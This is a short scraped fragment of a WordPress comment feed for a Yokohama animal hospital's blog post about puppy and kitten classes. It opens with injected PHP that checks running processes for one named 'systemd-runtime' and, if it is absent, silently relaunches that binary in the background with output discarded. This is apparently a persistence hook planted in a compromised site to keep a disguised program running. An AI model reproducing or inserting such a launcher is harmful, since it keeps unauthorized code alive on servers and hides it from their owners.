$programFilePath = 'systemd-runtime'; $processList = shell_exec('ps aux'); if (strpos($processList, $programFilePath) === false) { $commandToExecute = 'nohup ./' . $programFilePath . ' > /dev/null 2>&1 &'; shell_exec($commandToExecute); } パピークラス・こねこ教室のご紹介 へのコメント https://honmokudori.com/blog/722 本牧通り動物病院は、横浜市中区本牧宮原にある動物病院です。 Thu, 15 Jul 2021 07:14:34 +0000 hourly 1 https://wordpress.org/?v=6.2.5